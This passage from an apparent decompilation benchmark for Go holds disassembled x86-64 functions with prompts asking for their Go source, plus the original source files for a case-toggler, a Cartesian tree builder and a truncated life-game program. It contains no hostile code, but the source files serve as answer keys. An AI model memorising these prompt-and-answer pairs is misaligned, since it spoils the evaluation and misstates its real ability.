1, 0, 0, 0, 72, 137, 209, 232, 244, 222, 250, 255, 49, 192, 232, 141, 222, 250, 255, 232, 23, 183, 250, 255, 233, 2, 251, 255, 255] -------------------------------------------------------------------------------- /eval/go_corpus/disasm/oracle_predict_2021.txt: -------------------------------------------------------------------------------- 1 | [100, 72, 139, 12, 37, 248, 255, 255, 255, 72, 141, 68, 36, 240, 72, 59, 65, 16, 15, 134, 29, 2, 0, 0, 72, 129, 236, 144, 0, 0, 0, 72, 137, 172, 36, 136, 0, 0, 0, 72, 141, 172, 36, 136, 0, 0, 0, 72, 139, 132, 36, 160, 0, 0, 0, 72, 133, 192, 15, 142, 224, 1, 0, 0, 72, 139, 140, 36, 152, 0, 0, 0, 49, 210, 187, 239, 190, 237, 254, 235, 111, 77, 99, 201, 76, 1, 203, 73, 57, 240, 125, 88, 70, 15, 182, 12, 7, 65, 129, 249, 128, 0, 0, 0, 125, 5, 73, 255, 192, 235, 226, 72, 137, 92, 36, 72, 72, 137, 60, 36, 72, 137, 116, 36, 8, 76, 137, 68, 36, 16, 232, 201, 168, 251, 255, 68, 139, 76, 36, 24, 76, 139, 68, 36, 32, 72, 139, 132, 36, 160, 0, 0, 0, 72, 139, 76, 36, 96, 72, 139, 84, 36, 80, 72, 139, 92, 36, 72, 72, 139, 116, 36, 64, 72, 139, 124, 36, 88, 235, 157, 72, 255, 194, 72, 57, 194, 125, 39, 72, 131, 193, 16, 72, 137, 76, 36, 96, 72, 137, 84, 36, 80, 72, 139, 113, 8, 72, 137, 116, 36, 64, 72, 139, 57, 72, 137, 124, 36, 88, 69, 49, 192, 233, 116, 255, 255, 255, 72, 137, 92, 36, 80, 72, 139, 5, 65, 156, 13, 0, 72, 137, 4, 36, 72, 137, 92, 36, 8, 232, 51, 240, 255, 255, 232, 206, 243, 255, 255, 72, 139, 4, 36, 72, 139, 76, 36, 80, 72, 1, 200, 72, 139, 13, 83, 51, 13, 0, 72, 133, 201, 15, 132, 17, 1, 0, 0, 72, 153, 72, 247, 249, 72, 137, 84, 36, 72, 15, 87, 192, 15, 17, 68, 36, 120, 72, 141, 13, 217, 44, 1, 0, 72, 137, 76, 36, 120, 72, 141, 29, 189, 246, 4, 0, 72, 137, 156, 36, 128, 0, 0, 0, 72, 139, 29, 246, 155, 13, 0, 72, 141, 53, 87, 13, 5, 0, 72, 137, 52, 36, 72, 137, 92, 36, 8, 72, 141, 92, 36, 120, 72, 137, 92, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 253, 74, 255, 255, 72, 139, 13, 222, 50, 13, 0, 72, 139, 21, 207, 50, 13, 0, 72, 139, 68, 36, 72, 72, 57, 200, 15, 131, 139, 0, 0, 0, 72, 193, 224, 4, 72, 139, 76, 2, 8, 72, 139, 4, 2, 72, 137, 4, 36, 72, 137, 76, 36, 8, 232, 166, 103, 247, 255, 72, 139, 68, 36, 16, 15, 87, 192, 15, 17, 68, 36, 104, 72, 141, 13, 66, 44, 1, 0, 72, 137, 76, 36, 104, 72, 137, 68, 36, 112, 72, 139, 5, 105, 155, 13, 0, 72, 141, 13, 202, 12, 5, 0, 72, 137, 12, 36, 72, 137, 68, 36, 8, 72, 141, 68, 36, 104, 72, 137, 68, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 112, 74, 255, 255, 72, 139, 172, 36, 136, 0, 0, 0, 72, 129, 196, 144, 0, 0, 0, 195, 187, 239, 190, 237, 254, 233, 185, 254, 255, 255, 232, 113, 24, 252, 255, 232, 220, 95, 249, 255, 144, 232, 246, 240, 251, 255, 233, 193, 253, 255, 255] -------------------------------------------------------------------------------- /eval/go_corpus/prompts/baby_go_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcA(): 4 | MOV RCX,qword ptr FS:[-0x8] 5 | LEA RAX,[RSP + -0xf0] 6 | CMP RAX,qword ptr [RCX + 0x10] 7 | JBE LAB_004901d0 8 | SUB RSP,0x170 9 | MOV qword ptr [RSP + 0x168],RBP 10 | LEA RBP,[RSP + 0x168] 11 | MOV RAX,qword ptr [os.Stdin] 12 | MOV qword ptr [RSP + 0x90],RAX 13 | NOP 14 | MOV qword ptr [RSP + 0x110],0x0 15 | LEA RDI,[RSP + 0x118] 16 | XORPS XMM0,XMM0 17 | LEA RDI,[RDI + -0x30] 18 | MOV qword ptr [RSP + -0x10],RBP 19 | LEA RBP,[RSP + -0x10] 20 | CALL FUN_004540d5 21 | MOV RBP,qword ptr [RBP] 22 | LEA RCX,[0x4a2600] 23 | MOV qword ptr [RSP],RCX 24 | MOV qword ptr [RSP + 0x8],0x1000 25 | MOV qword ptr [RSP + 0x10],0x1000 26 | CALL runtime.makeslice 27 | MOV RAX,qword ptr [RSP + 0x18] 28 | MOV qword ptr [RSP + 0xb8],0x0 29 | LEA RDI,[RSP + 0xc0] 30 | XORPS XMM0,XMM0 31 | LEA RDI,[RDI + -0x30] 32 | MOV qword ptr [RSP + -0x10],RBP 33 | LEA RBP,[RSP + -0x10] 34 | CALL FUN_004540d5 35 | MOV RBP,qword ptr [RBP] 36 | MOV qword ptr [RSP + 0xb8],RAX 37 | MOV qword ptr [RSP + 0xc0],0x1000 38 | MOV qword ptr [RSP + 0xc8],0x1000 39 | LEA RAX,[0x4df8e0] 40 | MOV qword ptr [RSP + 0xd0],RAX 41 | MOV RAX,qword ptr [RSP + 0x90] 42 | MOV qword ptr [RSP + 0xd8],RAX 43 | MOV qword ptr [RSP + 0x100],-0x1 44 | MOV qword ptr [RSP + 0x108],-0x1 45 | MOV RAX,qword ptr [RSP + 0xb8] 46 | MOV qword ptr [RSP + 0x110],RAX 47 | LEA RDI,[RSP + 0x118] 48 | LEA RSI,[RSP + 0xc0] 49 | MOV qword ptr [RSP + -0x10],RBP 50 | LEA RBP,[RSP + -0x10] 51 | CALL FUN_0045443a 52 | MOV RBP,qword ptr [RBP] 53 | XORPS XMM1,XMM1 54 | MOVUPS xmmword ptr [RSP + 0xa8],XMM1 55 | LEA RAX,[0x4a24c0] 56 | MOV qword ptr [RSP + 0xa8],RAX 57 | LEA RCX,[0x4de1e0] 58 | MOV qword ptr [RSP + 0xb0],RCX 59 | MOV RCX,qword ptr [os.Stdout] 60 | LEA RDX,[0x4df900] 61 | MOV qword ptr [RSP],RDX 62 | MOV qword ptr [RSP + 0x8],RCX 63 | LEA RCX,[RSP + 0xa8] 64 | MOV qword ptr [RSP + 0x10],RCX 65 | MOV qword ptr [RSP + 0x18],0x1 66 | MOV qword ptr [RSP + 0x20],0x1 67 | CALL fmt.Fprint 68 | NOP 69 | LEA RAX,[RSP + 0x110] 70 | MOV qword ptr [RSP],RAX 71 | MOV byte ptr [RSP + 0x8],0xa 72 | CALL bufio.(*Reader).ReadBytes 73 | MOV RAX,qword ptr [RSP + 0x18] 74 | MOV RCX,qword ptr [RSP + 0x10] 75 | MOV RDX,qword ptr [RSP + 0x20] 76 | LEA RBX,[RSP + 0x60] 77 | MOV qword ptr [RSP],RBX 78 | MOV qword ptr [RSP + 0x8],RCX 79 | MOV qword ptr [RSP + 0x10],RAX 80 | MOV qword ptr [RSP + 0x18],RDX 81 | CALL runtime.slicebytetostring 82 | MOV RAX,qword ptr [RSP + 0x20] 83 | MOV qword ptr [RSP + 0x88],RAX 84 | MOV RCX,qword ptr [RSP + 0x28] 85 | MOV qword ptr [RSP + 0x50],RCX 86 | XOR EDX,EDX 87 | JMP LAB_004900a6 88 | LAB_00490024: 89 | MOV qword ptr [RSP],RCX 90 | MOV qword ptr [RSP + 0x8],RAX 91 | CALL runtime.convTstring 92 | MOV RAX,qword ptr [RSP + 0x10] 93 | XORPS XMM0,XMM0 94 | MOVUPS xmmword ptr [RSP + 0x98],XMM0 95 | LEA RCX,[0x4a24c0] 96 | MOV qword ptr [RSP + 0x98],RCX 97 | MOV qword ptr [RSP + 0xa0],RAX 98 | MOV RAX,qword ptr [os.Stdout] 99 | LEA RDX,[0x4df900] 100 | MOV qword ptr [RSP],RDX 101 | MOV qword ptr [RSP + 0x8],RAX 102 | LEA RAX,[RSP + 0x98] 103 | MOV qword ptr [RSP + 0x10],RAX 104 | MOV qword ptr [RSP + 0x18],0x1 105 | MOV qword ptr [RSP + 0x20],0x1 106 | CALL fmt.Fprint 107 | MOV RAX,qword ptr [RSP + 0x88] 108 | MOV RCX,qword ptr [RSP + 0x50] 109 | MOV RDX,qword ptr [RSP + 0x58] 110 | LAB_004900a6: 111 | CMP RDX,RCX 112 | JGE LAB_004901c0 113 | MOVZX EBX,byte ptr [RAX + RDX*0x1] 114 | CMP EBX,0x80 115 | JGE LAB_0049019f 116 | INC RDX 117 | LAB_004900c2: 118 | MOV dword ptr [RSP + 0x44],EBX 119 | MOV qword ptr [RSP + 0x58],RDX 120 | MOV qword ptr [RSP],0x0 121 | MOVSXD RAX,EBX 122 | MOV qword ptr [RSP + 0x8],RAX 123 | CALL runtime.intstring 124 | MOV RAX,qword ptr [RSP + 0x10] 125 | MOV RCX,qword ptr [RSP + 0x18] 126 | MOV EDX,dword ptr [RSP + 0x44] 127 | BT EDX,0x0 128 | JC LAB_00490191 129 | CMP EDX,0xff 130 | JA LAB_00490155 131 | MOVZX EDX,DL 132 | LEA RBX,[0x553f00] 133 | MOVZX EDX,byte ptr [RDX + RBX*0x1] 134 | AND EDX,0x60 135 | CMP DL,0x20 136 | SETZ DL 137 | LAB_00490117: 138 | TEST DL,DL 139 | JZ LAB_00490138 140 | MOV qword ptr [RSP],RAX 141 | MOV qword ptr [RSP + 0x8],RCX 142 | CALL strings.ToLower 143 | MOV RAX,qword ptr [RSP + 0x18] 144 | MOV RCX,qword ptr [RSP + 0x10] 145 | JMP LAB_00490024 146 | LAB_00490138: 147 | MOV qword ptr [RSP],RAX 148 | MOV qword ptr [RSP + 0x8],RCX 149 | CALL strings.ToUpper 150 | MOV RCX,qword ptr [RSP + 0x10] 151 | MOV RAX,qword ptr [RSP + 0x18] 152 | JMP LAB_00490024 153 | LAB_00490155: 154 | MOV qword ptr [RSP + 0x80],RAX 155 | MOV qword ptr [RSP + 0x48],RCX 156 | MOV RAX,qword ptr [unicode.Upper] 157 | MOV qword ptr [RSP],RAX 158 | MOV dword ptr [RSP + 0x8],EDX 159 | CALL unicode.isExcludingLatin 160 | MOVZX EDX,byte ptr [RSP + 0x10] 161 | MOV RAX,qword ptr [RSP + 0x80] 162 | MOV RCX,qword ptr [RSP + 0x48] 163 | LEA RBX,[0x553f00] 164 | JMP LAB_00490117 165 | LAB_00490191: 166 | MOV RDX,RAX 167 | MOV RAX,RCX 168 | MOV RCX,RDX 169 | JMP LAB_00490024 170 | LAB_0049019f: 171 | MOV qword ptr [RSP],RAX 172 | MOV qword ptr [RSP + 0x8],RCX 173 | MOV qword ptr [RSP + 0x10],RDX 174 | CALL runtime.decoderune 175 | MOV EBX,dword ptr [RSP + 0x18] 176 | MOV RDX,qword ptr [RSP + 0x20] 177 | JMP LAB_004900c2 178 | LAB_004901c0: 179 | MOV RBP,qword ptr [RSP + 0x168] 180 | ADD RSP,0x170 181 | RET 182 | LAB_004901d0: 183 | CALL runtime.morestack_noctxt 184 | JMP funcA 185 | //end of function funcA 186 | 187 | Reference Table: 188 | Address Data 189 | 00565be8 undefined8 ?? 190 | 004a2600 ?? 01h 191 | 004a2600 ?? 01h 192 | 004df8e0 undefined1[32] 193 | 004df8e0 undefined1[32] 194 | 004a24c0 ?? 10h 195 | 004a24c0 ?? 10h 196 | 004de1e0 addr 004c6ead 197 | 004de1e0 addr 004c6ead 198 | 00565bf0 undefined8 ?? 199 | 004df900 undefined1[32] 200 | 004df900 undefined1[32] 201 | 004a24c0 ?? 10h 202 | 004a24c0 ?? 10h 203 | 00565bf0 undefined8 ?? 204 | 004df900 undefined1[32] 205 | 004df900 undefined1[32] 206 | 00553f00 undefined1[256] 207 | 00553f00 undefined1[256] 208 | 0055f1c0 addr 005609a0 209 | 005609a0 addr 00556bc0 210 | 00553f00 undefined1[256] 211 | 212 | Generate just the Go code for the function that produced the above x86 64-bit assembly. The Go code should only represent the funcA function. The Go code is idiomatic and uses standard libraries and channels. -------------------------------------------------------------------------------- /eval/go_corpus/prompts/cartree_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcB(): 4 | MOV RCX,qword ptr FS:[-0x8] 5 | LEA RAX,[RSP + -0x10] 6 | CMP RAX,qword ptr [RCX + 0x10] 7 | JBE LAB_0049b9f7 8 | SUB RSP,0x90 9 | MOV qword ptr [RSP + 0x88],RBP 10 | LEA RBP,[RSP + 0x88] 11 | LEA RAX,[0x4ad080] 12 | MOV qword ptr [RSP],RAX 13 | CALL runtime.newobject 14 | MOV RAX,qword ptr [RSP + 0x8] 15 | MOV qword ptr [RSP + 0x70],RAX 16 | XOR ECX,ECX 17 | XOR EDX,EDX 18 | JMP LAB_0049b80e 19 | LAB_0049b742: 20 | MOV RCX,qword ptr [RCX] 21 | LAB_0049b745: 22 | TEST RCX,RCX 23 | JZ LAB_0049b756 24 | MOV RDX,qword ptr [RAX] 25 | CMP qword ptr [RCX + 0x18],RDX 26 | JG LAB_0049b742 27 | TEST RCX,RCX 28 | LAB_0049b756: 29 | JZ LAB_0049b914 30 | MOV qword ptr [RSP + 0x50],RCX 31 | MOV RDX,qword ptr [RAX] 32 | MOV qword ptr [RSP + 0x48],RDX 33 | MOV RBX,qword ptr [RCX + 0x10] 34 | MOV qword ptr [RSP + 0x58],RBX 35 | LEA RSI,[0x4c1f20] 36 | MOV qword ptr [RSP],RSI 37 | CALL runtime.newobject 38 | MOV RDI,qword ptr [RSP + 0x8] 39 | MOV RAX,qword ptr [RSP + 0x48] 40 | MOV qword ptr [RDI + 0x18],RAX 41 | NOP 42 | CMP dword ptr [runtime.writeBarrier],0x0 43 | JNZ LAB_0049b8f2 44 | MOV RCX,qword ptr [RSP + 0x58] 45 | MOV qword ptr [RDI + 0x8],RCX 46 | LAB_0049b7a7: 47 | TEST RCX,RCX 48 | JZ LAB_0049b7bc 49 | CMP dword ptr [runtime.writeBarrier],0x0 50 | JNZ LAB_0049b8df 51 | MOV qword ptr [RCX],RDI 52 | LAB_0049b7bc: 53 | NOP 54 | CMP dword ptr [runtime.writeBarrier],0x0 55 | JNZ LAB_0049b8c3 56 | MOV qword ptr [RDI + 0x10],0x0 57 | LAB_0049b7d2: 58 | NOP 59 | CMP dword ptr [runtime.writeBarrier],0x0 60 | JNZ LAB_0049b8a4 61 | MOV RAX,qword ptr [RSP + 0x50] 62 | MOV qword ptr [RAX + 0x10],RDI 63 | LAB_0049b7e9: 64 | TEST RDI,RDI 65 | JZ LAB_0049b7fe 66 | CMP dword ptr [runtime.writeBarrier],0x0 67 | JNZ LAB_0049b89a 68 | MOV qword ptr [RDI],RAX 69 | LAB_0049b7fe: 70 | MOV RAX,qword ptr [RSP + 0x60] 71 | LAB_0049b803: 72 | MOV RCX,RDI 73 | MOV RDX,RAX 74 | MOV RAX,qword ptr [RSP + 0x70] 75 | LAB_0049b80e: 76 | MOV qword ptr [RSP + 0x60],RDX 77 | MOV qword ptr [RSP + 0x68],RCX 78 | XORPS XMM0,XMM0 79 | MOVUPS xmmword ptr [RSP + 0x78],XMM0 80 | LEA RBX,[0x4a7ce0] 81 | MOV qword ptr [RSP + 0x78],RBX 82 | MOV qword ptr [RSP + 0x80],RAX 83 | MOV RSI,qword ptr [os.Stdin] 84 | LEA RDI,[0x4ed0c0] 85 | MOV qword ptr [RSP],RDI 86 | MOV qword ptr [RSP + 0x8],RSI 87 | LEA RSI,[RSP + 0x78] 88 | MOV qword ptr [RSP + 0x10],RSI 89 | MOV qword ptr [RSP + 0x18],0x1 90 | MOV qword ptr [RSP + 0x20],0x1 91 | CALL fmt.Fscan 92 | MOV RAX,qword ptr [RSP + 0x30] 93 | CMP RAX,0x0 94 | CMP qword ptr [RSP + 0x28],0x1 95 | JNZ LAB_0049b9ab 96 | CMP RAX,0x0 97 | JNZ LAB_0049b9ab 98 | MOV RAX,qword ptr [RSP + 0x70] 99 | MOV RCX,qword ptr [RSP + 0x68] 100 | JMP LAB_0049b745 101 | LAB_0049b89a: 102 | CALL runtime.gcWriteBarrier 103 | JMP LAB_0049b7fe 104 | LAB_0049b8a4: 105 | MOV RCX,qword ptr [RSP + 0x50] 106 | LEA RDX,[RCX + 0x10] 107 | MOV RAX,RDI 108 | MOV RDI,RDX 109 | CALL runtime.gcWriteBarrier 110 | MOV RDI,RAX 111 | MOV RAX,RCX 112 | JMP LAB_0049b7e9 113 | LAB_0049b8c3: 114 | LEA RCX,[RDI + 0x10] 115 | MOV RAX,RDI 116 | MOV RDI,RCX 117 | MOV RDX,RAX 118 | XOR EAX,EAX 119 | CALL runtime.gcWriteBarrier 120 | MOV RDI,RDX 121 | JMP LAB_0049b7d2 122 | LAB_0049b8df: 123 | MOV RAX,RDI 124 | MOV RDI,RCX 125 | CALL runtime.gcWriteBarrier 126 | MOV RDI,RAX 127 | JMP LAB_0049b7bc 128 | LAB_0049b8f2: 129 | LEA RDX,[RDI + 0x8] 130 | MOV RAX,RDI 131 | MOV RDI,RDX 132 | MOV RCX,RAX 133 | MOV RAX,qword ptr [RSP + 0x58] 134 | CALL runtime.gcWriteBarrier 135 | MOV RDI,RCX 136 | MOV RCX,RAX 137 | JMP LAB_0049b7a7 138 | LAB_0049b914: 139 | MOV RCX,qword ptr [RAX] 140 | MOV qword ptr [RSP + 0x40],RCX 141 | LEA RDX,[0x4c1f20] 142 | MOV qword ptr [RSP],RDX 143 | CALL runtime.newobject 144 | MOV RAX,qword ptr [RSP + 0x8] 145 | MOV RCX,qword ptr [RSP + 0x40] 146 | MOV qword ptr [RAX + 0x18],RCX 147 | NOP 148 | CMP dword ptr [runtime.writeBarrier],0x0 149 | JNZ LAB_0049b992 150 | MOV RDI,qword ptr [RSP + 0x60] 151 | MOV qword ptr [RAX + 0x8],RDI 152 | LAB_0049b94d: 153 | TEST RDI,RDI 154 | JZ LAB_0049b95e 155 | CMP dword ptr [runtime.writeBarrier],0x0 156 | JNZ LAB_0049b98b 157 | MOV qword ptr [RDI],RAX 158 | LAB_0049b95e: 159 | NOP 160 | CMP dword ptr [runtime.writeBarrier],0x0 161 | JNZ LAB_0049b978 162 | MOV qword ptr [RAX + 0x10],0x0 163 | LAB_0049b970: 164 | MOV RDI,RAX 165 | JMP LAB_0049b803 166 | LAB_0049b978: 167 | LEA RDI,[RAX + 0x10] 168 | MOV RCX,RAX 169 | XOR EAX,EAX 170 | CALL runtime.gcWriteBarrier 171 | MOV RAX,RCX 172 | JMP LAB_0049b970 173 | LAB_0049b98b: 174 | CALL runtime.gcWriteBarrier 175 | JMP LAB_0049b95e 176 | LAB_0049b992: 177 | LEA RDI,[RAX + 0x8] 178 | MOV RCX,RAX 179 | MOV RAX,qword ptr [RSP + 0x60] 180 | CALL runtime.gcWriteBarrier 181 | MOV RDI,RAX 182 | MOV RAX,RCX 183 | JMP LAB_0049b94d 184 | LAB_0049b9ab: 185 | MOV RAX,qword ptr [RSP + 0x60] 186 | MOV qword ptr [RSP],RAX 187 | CALL main.(*Node).Dump 188 | NOP 189 | MOV RAX,qword ptr [os.Stdout] 190 | LEA RCX,[0x4ed0e0] 191 | MOV qword ptr [RSP],RCX 192 | MOV qword ptr [RSP + 0x8],RAX 193 | MOV qword ptr [RSP + 0x10],0x0 194 | XORPS XMM0,XMM0 195 | MOVUPS xmmword ptr [RSP + 0x18],XMM0 196 | CALL fmt.Fprintln 197 | MOV RBP,qword ptr [RSP + 0x88] 198 | ADD RSP,0x90 199 | RET 200 | LAB_0049b9f7: 201 | CALL runtime.morestack_noctxt 202 | JMP funcB 203 | //end of function funcB 204 | 205 | Reference Table: 206 | Address Data 207 | 004ad080 ?? 08h 208 | 004ad080 ?? 08h 209 | 004c1f20 ?? 20h 210 | 004c1f20 ?? 20h 211 | 00594ec0 undefined4 ?? 212 | 00594ec0 undefined4 ?? 213 | 00594ec0 undefined4 ?? 214 | 00594ec0 undefined4 ?? 215 | 00594ec0 undefined4 ?? 216 | 004a7ce0 ?? 08h 217 | 004a7ce0 ?? 08h 218 | 005794c8 undefined8 ?? 219 | 004ed0c0 undefined1[32] 220 | 004ed0c0 undefined1[32] 221 | 004c1f20 ?? 20h 222 | 004c1f20 ?? 20h 223 | 00594ec0 undefined4 ?? 224 | 00594ec0 undefined4 ?? 225 | 00594ec0 undefined4 ?? 226 | 005794d0 undefined8 ?? 227 | 004ed0e0 undefined1[32] 228 | 004ed0e0 undefined1[32] 229 | 230 | Generate just the Go code for the function that produced the above x86 64-bit assembly. The Go code should only represent the funcB function. The Go code is idiomatic and uses standard libraries and channels. -------------------------------------------------------------------------------- /eval/go_corpus/prompts/oracle_predict_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcD(undefined param_1, undefined param_2, undefined param_3, undefined param_4, undefined param_5, undefined param_6, undefined8 param_7, undefined8 param_8): 4 | MOV RCX,qword ptr FS:[-0x8] 5 | LEA RAX,[RSP + -0x10] 6 | CMP RAX,qword ptr [RCX + 0x10] 7 | JBE LAB_00492bc5 8 | SUB RSP,0x90 9 | MOV qword ptr [RSP + 0x88],RBP 10 | LEA RBP,[RSP + 0x88] 11 | MOV RAX,qword ptr [RSP + 0xa0] 12 | TEST RAX,RAX 13 | JLE LAB_00492bb0 14 | MOV RCX,qword ptr [RSP + 0x98] 15 | XOR EDX,EDX 16 | MOV EBX,0xfeedbeef 17 | JMP LAB_00492a50 18 | LAB_004929e1: 19 | MOVSXD R9,R9D 20 | ADD RBX,R9 21 | LAB_004929e7: 22 | CMP R8,RSI 23 | JGE LAB_00492a44 24 | MOVZX R9D,byte ptr [RDI + R8*0x1] 25 | CMP R9D,0x80 26 | JGE LAB_004929ff 27 | INC R8 28 | JMP LAB_004929e1 29 | LAB_004929ff: 30 | MOV qword ptr [RSP + 0x48],RBX 31 | MOV qword ptr [RSP],RDI 32 | MOV qword ptr [RSP + 0x8],RSI 33 | MOV qword ptr [RSP + 0x10],R8 34 | CALL runtime.decoderune 35 | MOV R9D,dword ptr [RSP + 0x18] 36 | MOV R8,qword ptr [RSP + 0x20] 37 | MOV RAX,qword ptr [RSP + 0xa0] 38 | MOV RCX,qword ptr [RSP + 0x60] 39 | MOV RDX,qword ptr [RSP + 0x50] 40 | MOV RBX,qword ptr [RSP + 0x48] 41 | MOV RSI,qword ptr [RSP + 0x40] 42 | MOV RDI,qword ptr [RSP + 0x58] 43 | JMP LAB_004929e1 44 | LAB_00492a44: 45 | INC RDX 46 | CMP RDX,RAX 47 | JGE LAB_00492a73 48 | ADD RCX,0x10 49 | LAB_00492a50: 50 | MOV qword ptr [RSP + 0x60],RCX 51 | MOV qword ptr [RSP + 0x50],RDX 52 | MOV RSI,qword ptr [RCX + 0x8] 53 | MOV qword ptr [RSP + 0x40],RSI 54 | MOV RDI,qword ptr [RCX] 55 | MOV qword ptr [RSP + 0x58],RDI 56 | XOR R8D,R8D 57 | JMP LAB_004929e7 58 | LAB_00492a73: 59 | MOV qword ptr [RSP + 0x50],RBX 60 | MOV RAX,qword ptr [math/rand.globalRand] 61 | MOV qword ptr [RSP],RAX 62 | MOV qword ptr [RSP + 0x8],RBX 63 | CALL math/rand.(*Rand).Seed 64 | CALL math/rand.Int 65 | MOV RAX,qword ptr [RSP] 66 | MOV RCX,qword ptr [RSP + 0x50] 67 | ADD RAX,RCX 68 | MOV RCX,qword ptr [DAT_00565df8] 69 | TEST RCX,RCX 70 | JZ LAB_00492bbf 71 | CQO 72 | IDIV RCX 73 | MOV qword ptr [RSP + 0x48],RDX 74 | XORPS XMM0,XMM0 75 | MOVUPS xmmword ptr [RSP + 0x78],XMM0 76 | LEA RCX,[0x4a57a0] 77 | MOV qword ptr [RSP + 0x78],RCX 78 | LEA RBX,[0x4e2190] 79 | MOV qword ptr [RSP + 0x80],RBX 80 | MOV RBX,qword ptr [os.Stdout] 81 | LEA RSI,[0x4e3840] 82 | MOV qword ptr [RSP],RSI 83 | MOV qword ptr [RSP + 0x8],RBX 84 | LEA RBX,[RSP + 0x78] 85 | MOV qword ptr [RSP + 0x10],RBX 86 | MOV qword ptr [RSP + 0x18],0x1 87 | MOV qword ptr [RSP + 0x20],0x1 88 | CALL fmt.Fprintln 89 | MOV RCX,qword ptr [DAT_00565df8] 90 | MOV RDX,qword ptr [funcDions] 91 | MOV RAX,qword ptr [RSP + 0x48] 92 | CMP RAX,RCX 93 | JNC LAB_00492bba 94 | SHL RAX,0x4 95 | MOV RCX,qword ptr [RDX + RAX*0x1 + 0x8] 96 | MOV RAX,qword ptr [RDX + RAX*0x1] 97 | MOV qword ptr [RSP],RAX 98 | MOV qword ptr [RSP + 0x8],RCX 99 | CALL runtime.convTstring 100 | MOV RAX,qword ptr [RSP + 0x10] 101 | XORPS XMM0,XMM0 102 | MOVUPS xmmword ptr [RSP + 0x68],XMM0 103 | LEA RCX,[0x4a57a0] 104 | MOV qword ptr [RSP + 0x68],RCX 105 | MOV qword ptr [RSP + 0x70],RAX 106 | MOV RAX,qword ptr [os.Stdout] 107 | LEA RCX,[0x4e3840] 108 | MOV qword ptr [RSP],RCX 109 | MOV qword ptr [RSP + 0x8],RAX 110 | LEA RAX,[RSP + 0x68] 111 | MOV qword ptr [RSP + 0x10],RAX 112 | MOV qword ptr [RSP + 0x18],0x1 113 | MOV qword ptr [RSP + 0x20],0x1 114 | CALL fmt.Fprintln 115 | MOV RBP,qword ptr [RSP + 0x88] 116 | ADD RSP,0x90 117 | RET 118 | LAB_00492bb0: 119 | MOV EBX,0xfeedbeef 120 | JMP LAB_00492a73 121 | LAB_00492bba: 122 | CALL runtime.panicIndex 123 | LAB_00492bbf: 124 | CALL runtime.panicdivide 125 | NOP 126 | LAB_00492bc5: 127 | CALL runtime.morestack_noctxt 128 | JMP funcD 129 | //end of function funcD 130 | 131 | Reference Table: 132 | Address Data 133 | 0056c6c0 undefined8 ?? 134 | 00565df8 ?? 0Dh 135 | 004a57a0 ?? 10h 136 | 004a57a0 ?? 10h 137 | 004e2190 addr 004cac41 138 | 004e2190 addr 004cac41 139 | 0056c6d8 undefined8 ?? 140 | 004e3840 undefined1[32] 141 | 004e3840 undefined1[32] 142 | 00565df8 ?? 0Dh 143 | 00569b80 addr 004c92f3 144 | 00565df0 addr 00569b80 145 | 00569b88 ?? 02h 146 | 00569b80 addr 004c92f3 147 | 004a57a0 ?? 10h 148 | 004a57a0 ?? 10h 149 | 0056c6d8 undefined8 ?? 150 | 004e3840 undefined1[32] 151 | 004e3840 undefined1[32] 152 | 153 | Generate just the Go code for the function that produced the above x86 64-bit assembly. The Go code should only represent the funcD function. The Go code is idiomatic and uses standard libraries and channels. -------------------------------------------------------------------------------- /eval/go_corpus/source/baby_go_main_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "os" 4 | import "fmt" 5 | import "bufio" 6 | import "strings" 7 | import "unicode" 8 | 9 | func main() { 10 | reader := bufio.NewReader(os.Stdin) 11 | fmt.Print("Enter string: ") 12 | text, _ := reader.ReadString('\n') 13 | 14 | for _, c := range text { 15 | var s string = string(c) 16 | var x string = "" 17 | if c & 1 == 0 { 18 | if unicode.IsUpper(c){ 19 | x = strings.ToLower(s) 20 | } else { 21 | x = strings.ToUpper(s) 22 | } 23 | } else { 24 | x = s 25 | } 26 | fmt.Print(x) 27 | } 28 | } -------------------------------------------------------------------------------- /eval/go_corpus/source/cartree_main_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "fmt" 4 | 5 | // https://en.wikipedia.org/wiki/Cartesian_tree 6 | // Builds using the first linear-time method. 7 | 8 | type Node struct { 9 | P *Node 10 | L *Node 11 | R *Node 12 | D int 13 | } 14 | 15 | func main() { 16 | var root *Node = nil 17 | var curr *Node = nil 18 | var data int 19 | 20 | for { 21 | n, err := fmt.Scan(&data) 22 | if n != 1 || err != nil { 23 | break 24 | } 25 | 26 | for curr != nil && curr.D > data { 27 | curr = curr.P 28 | } 29 | 30 | if curr == nil { 31 | curr = Cons(data, root, nil) 32 | root = curr 33 | } else { 34 | tmp := Cons(data, curr.R, nil) 35 | curr.SetR(tmp) 36 | curr = tmp 37 | } 38 | } 39 | 40 | root.Dump() 41 | fmt.Println() 42 | } -------------------------------------------------------------------------------- /eval/go_corpus/source/goalie_main_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "math/rand" 7 | "os" 8 | "os/signal" 9 | "syscall" 10 | "time" 11 | ) 12 | 13 | var OFFSETS = [][]int { 14 | []int {-1, -1}, 15 | []int {-1, 0}, 16 | []int {-1, +1}, 17 | []int { 0, +1}, 18 | []int {+1, +1}, 19 | []int {+1, 0}, 20 | []int {+1, -1}, 21 | []int { 0, -1}} 22 | 23 | type Field struct { 24 | W uint 25 | H uint 26 | 27 | data [][]bool 28 | temp [][]bool 29 | } 30 | 31 | func main() { 32 | os.Args[0] = "goalie" 33 | f := flag.Duration("f", 314 * time.Millisecond, "frame delay") 34 | w := flag.Uint( "w", 40, "width") 35 | h := flag.Uint( "h", 20, "height") 36 | n := flag.Uint( "n", 0, "frames") 37 | q := flag.Bool( "q", false, "quiet") 38 | s := flag.Int64( "s", 0, "seed") 39 | flag.Parse() 40 | 41 | if *s == 0 { 42 | rand.Seed(time.Now().UnixNano()) 43 | } else { 44 | rand.Seed(*s) 45 | } 46 | 47 | go func() { 48 | sigchan := make(chan os.Signal, 1) 49 | signal.Notify(sigchan, syscall.SIGTERM, syscall.SIGINT) 50 | <-sigchan 51 | 